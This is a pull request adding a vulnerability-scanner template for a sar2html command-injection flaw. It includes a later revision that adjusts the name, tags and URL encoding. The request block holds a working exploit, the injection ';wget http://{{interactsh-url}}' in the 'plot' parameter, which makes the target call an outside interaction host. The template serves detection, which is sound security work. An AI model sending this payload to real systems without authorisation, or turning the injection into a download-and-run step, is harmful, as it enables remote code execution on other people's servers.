### PR TITLE
Create sar2html-rce.yaml

### DIFF
--- a/vulnerabilities/other/sar2html-rce.yaml
+++ b/vulnerabilities/other/sar2html-rce.yaml
@@ -1,0 +1,28 @@
+id: sar2html-rce
+
+info:
+  name: Sar2HTML - Remote Code Execution
+  author: gy741
+  severity: critical
+  description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
+  reference: |
+    - https://www.exploit-db.com/exploits/49344
+  tags: sar2html,mirai,rce,oob
+
+requests:
+  - raw:
+      - |
+        GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: python-requests/2.18.4
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+    unsafe: true
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/vulnerabilities/other/sar2html-rce.yaml
+++ b/vulnerabilities/other/sar2html-rce.yaml
@@ -1,25 +1,23 @@
 id: sar2html-rce
 
 info:
-  name: Sar2HTML - Remote Code Execution
+  name: sar2html 3.2.1 - 'plot' Remote Code Execution
   author: gy741
   severity: critical
   description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
   reference: |
     - https://www.exploit-db.com/exploits/49344
-  tags: sar2html,mirai,rce,oob
+  tags: sar2html,rce,oob
 
 requests:
   - raw:
       - |
-        GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1
+        GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
         Host: {{Hostname}}
         User-Agent: python-requests/2.18.4
         Accept-Encoding: gzip, deflate
         Accept: */*
         Connection: keep-alive
-
-    unsafe: true
 
     matchers:
       - type: word


### PR DESCRIPTION
### Template / PR Information

Hello,

Added sar2html-rce.yaml

```
SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
```
- References: https://www.exploit-db.com/exploits/49344

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO